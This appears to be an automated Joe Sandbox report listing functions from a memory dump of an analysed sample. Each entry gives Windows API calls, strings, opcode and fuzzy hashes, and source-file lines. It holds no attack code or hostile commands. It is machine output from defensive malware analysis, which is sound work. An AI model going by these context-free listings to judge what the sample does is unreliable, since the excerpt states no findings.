                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                  • String ID: %s%u
                                                                                                                                                                  • API String ID: 3119225716-679674701
                                                                                                                                                                  • Opcode ID: 1742616da8824651c588ee3428c27ecd916f7bea61b2f77aa9392a7dbb646e8e
                                                                                                                                                                  • Instruction ID: 5100f8747165b3554e22a8b65126d4252d439cc53495b492895f099d4e4a7d73
                                                                                                                                                                  • Opcode Fuzzy Hash: 1742616da8824651c588ee3428c27ecd916f7bea61b2f77aa9392a7dbb646e8e
                                                                                                                                                                  • Instruction Fuzzy Hash: C6A1D131224707EFDB14DF60D884BEAB7E8FF68300F108529F95992191DB70EAA5CB91
                                                                                                                                                                  Function 0021E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0021E6E1
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E6F2
                                                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0021E71A
                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0021E737
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E755
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0021E766
                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0021E79E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E7AE
                                                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0021E7D5
                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0021E81E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E82E
                                                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0021E856
                                                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0021E8BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                                                  • Opcode ID: 53d97cf760b2ef73610e2e3e09d14fe33236859e763ac762ad373951f780a82d
                                                                                                                                                                  • Instruction ID: 4239641bb76de32596fc3a6b2e15dd2d2a8fb93724a0a0cbb2a7ea7caccd383d
                                                                                                                                                                  • Opcode Fuzzy Hash: 53d97cf760b2ef73610e2e3e09d14fe33236859e763ac762ad373951f780a82d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A81B03101434A9BEF05CF10DC85FAAB7D8EF64714F15846AFD859A092DB30DDA6CBA1
                                                                                                                                                                  Function 0021E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                                                  • Opcode ID: 93b2a5c838992af7e4e8ac768bdd8228c62caf481d108e2a575f0b44c20d2553
                                                                                                                                                                  • Instruction ID: f7de6bb6b8fe5413974bf075d31833ef97d5952a587a8ee3e24a34250f8dea59
                                                                                                                                                                  • Opcode Fuzzy Hash: 93b2a5c838992af7e4e8ac768bdd8228c62caf481d108e2a575f0b44c20d2553
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D319E31964646F6DF14EB61CD13EEE73A99F31708F610426F841710D2FFA16F688A51
                                                                                                                                                                  Function 0021F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 0021F8AB
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0021F8BD
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0021F8D4
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0021F8E9
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0021F8EF
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021F8FF
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0021F905
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0021F926
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0021F940
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021F949
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0021F9B4
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0021F9BA
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0021F9C1
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0021FA0D
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0021FA1A
                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0021FA3F
                                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0021FA6A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                                                  • Opcode ID: 51e3feb387150a0910c28d8ffc11d69e6cc1ac9db146ffcfc554011760f94e54
                                                                                                                                                                  • Instruction ID: 2cda82ac208d0a577dd37d756676de3ae297aeddf207196112524e52033f1112
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e3feb387150a0910c28d8ffc11d69e6cc1ac9db146ffcfc554011760f94e54
                                                                                                                                                                  • Instruction Fuzzy Hash: 62515070A0070AAFDB209FA8DE89FAEBBF5FF04704F004528E596A25A0D774A954CF50
                                                                                                                                                                  Function 0024CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024CD0B
                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 0024CD83
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0024CE04
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0024CE26
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0024CE35
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0024CE52
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001E0000,00000000), ref: 0024CE85
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0024CEA4
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0024CEB9
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0024CEC0
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0024CED2
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0024CEEA
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                                                  • Opcode ID: 0b35771326769c17f9856a32f373fd4a1ea90d8c3a51da45fd85e05b64be9251
                                                                                                                                                                  • Instruction ID: d348756853848aacb4de7150fdf3afa821fbc0fe9b734c3e1e1c1fd694a0a49c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b35771326769c17f9856a32f373fd4a1ea90d8c3a51da45fd85e05b64be9251
                                                                                                                                                                  • Instruction Fuzzy Hash: EA71F275250349AFE729CF28DC44FAA3BE5FB89704F54051CF986972A1DB71E821CB11
                                                                                                                                                                  Function 0022B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0022B46D
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0022B476
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B482
                                                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0022B561
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022B591
                                                                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 0022B5BD
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0022B63F
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 0022B6D1
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B727
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B736
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0022B772
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                                                  • Opcode ID: fee756fbf8e48644c81e9bb9beb503bbbb8002c61a7e15535314ed102ae68f35
                                                                                                                                                                  • Instruction ID: c9364842ec4252d48dc80071ff9f37c0f7da0eb37a9fc477cd015644e73c5149
                                                                                                                                                                  • Opcode Fuzzy Hash: fee756fbf8e48644c81e9bb9beb503bbbb8002c61a7e15535314ed102ae68f35
                                                                                                                                                                  • Instruction Fuzzy Hash: F6C1D431A20A26FBDB21EFA5E494B79F7B4FF09300F148455E4059B592DBB0EC60DBA1
                                                                                                                                                                  Function 00246F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00246FF9
                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00247044
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                                                  • Opcode ID: 07e55665c397a65175f598269e7e0893a8fd1a6147c9c4151d5addd664e78b6a
                                                                                                                                                                  • Instruction ID: d5fb005f2f69d535045344ac4a1de6e34170fb3a9f91b8d709abff6a4b5a8253
                                                                                                                                                                  • Opcode Fuzzy Hash: 07e55665c397a65175f598269e7e0893a8fd1a6147c9c4151d5addd664e78b6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7891A4342147029FCB18EF14C851A6DB7A2EF64350F04886DF8AA5B3A2DB71ED5ACB41
                                                                                                                                                                  Function 0024E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0024E3BB
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00249615,?), ref: 0024E417
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E457
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E49C
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E4D3
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,00249615,?), ref: 0024E4DF
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0024E4EF
                                                                                                                                                                  • DestroyCursor.USER32(?), ref: 0024E4FE
                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0024E51B
                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0024E527
                                                                                                                                                                    • Part of subcall function 00201BC7: __wcsicmp_l.LIBCMT ref: 00201C50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                                                                  • Opcode ID: 7304e6567880a646a641d610404e2abcfb9b1a91a4e44331b62032a396deace7
                                                                                                                                                                  • Instruction ID: 21175a424029f7e0e112ae8f6d4bf2af6166d679b6c83c369e82575aadf2d8b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 7304e6567880a646a641d610404e2abcfb9b1a91a4e44331b62032a396deace7
                                                                                                                                                                  • Instruction Fuzzy Hash: CB61C171A20619BFEF18DF64DC45FBE7BA8BB08710F108115F915E60D1DBB499A0CBA0
                                                                                                                                                                  Function 00230E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00230EFF
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00230F0F
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00230F1B
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00230F79
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230F91
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230FA3
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00230FB8
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230FCC
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230FFE
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0023101F
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 0023102B
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0023106A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                                                                  • Opcode ID: 05137c96fc4a42eb28a0d4b2ebf4ed34253187fa9dfdcedbc33cdf923e09c321
                                                                                                                                                                  • Instruction ID: 957c6717d9d9ec419fc7117e5ff8bd636ae677078731050d5285bf032e4e55ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 05137c96fc4a42eb28a0d4b2ebf4ed34253187fa9dfdcedbc33cdf923e09c321
                                                                                                                                                                  • Instruction Fuzzy Hash: BD617EB26147459FC710EF60C85499EB3E8FF89310F00891AF989C7251EB31E955CF92
                                                                                                                                                                  Function 0022DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0022DB26
                                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0022DB73
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DBBB
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DBF2
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DC20
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                                                  • Opcode ID: 418ee0ce11b053f000b65fdc5b6507cbb85fae01df6c4fd6a93c5ad4c540091b
                                                                                                                                                                  • Instruction ID: 82abfb2d6c03c1ceadb1f759476a835d4aca178d19bafdea0ff50f89abebf2cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 418ee0ce11b053f000b65fdc5b6507cbb85fae01df6c4fd6a93c5ad4c540091b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A519D71114705AFC700EF11D89196EB3E8FFA8718F00886DF895972A1EB71EE05CB42
                                                                                                                                                                  Function 00223110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
